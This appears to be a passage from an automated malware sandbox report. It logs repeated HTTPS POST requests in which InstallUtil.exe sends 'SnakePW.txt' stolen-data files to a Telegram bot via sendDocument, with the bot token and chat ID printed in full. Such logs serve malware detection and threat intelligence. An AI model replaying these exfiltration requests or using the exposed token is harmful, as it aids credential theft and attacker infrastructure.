                                                                                    Data Ascii: {"ok":true,"result":{"message_id":125,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765185


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    26192.168.2.550012149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:26 UTC328OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd362fe748a24b
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    2025-01-13 10:46:26 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 36 32 66 65 37 34 38 61 32 34 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd362fe748a24bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:26 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:26 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:26 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 31 38 36
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":126,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765186


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    27192.168.2.550013149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:27 UTC352OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd3642fcc118f5
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-13 10:46:27 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 36 34 32 66 63 63 31 31 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd3642fcc118f5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:27 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:27 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:27 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 31 38 37
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":127,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765187


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    28192.168.2.550014149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:28 UTC328OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd36560933a967
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    2025-01-13 10:46:28 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 36 35 36 30 39 33 33 61 39 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd36560933a967Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:28 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:28 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 523
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:28 UTC523INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 31 38 38
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":128,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765188


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    29192.168.2.550015149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:29 UTC352OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd366a55c94994
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-13 10:46:29 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 36 36 61 35 35 63 39 34 39 39 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd366a55c94994Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:29 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:29 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:29 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 31 38 39
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":129,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765189


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    30192.168.2.550016149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:30 UTC328OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd367d54533678
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    2025-01-13 10:46:30 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 36 37 64 35 34 35 33 33 36 37 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd367d54533678Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:30 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:30 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:30 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 31 39 30
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":130,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765190


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    31192.168.2.550017149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:31 UTC352OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd36918bf46dcd
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-13 10:46:31 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 36 39 31 38 62 66 34 36 64 63 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd36918bf46dcdContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:31 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:31 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:31 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 31 39 31
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":131,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765191


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    32192.168.2.550018149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:32 UTC328OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd36a6ff635513
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    2025-01-13 10:46:32 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 36 61 36 66 66 36 33 35 35 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd36a6ff635513Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:32 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:32 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:32 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 31 39 32
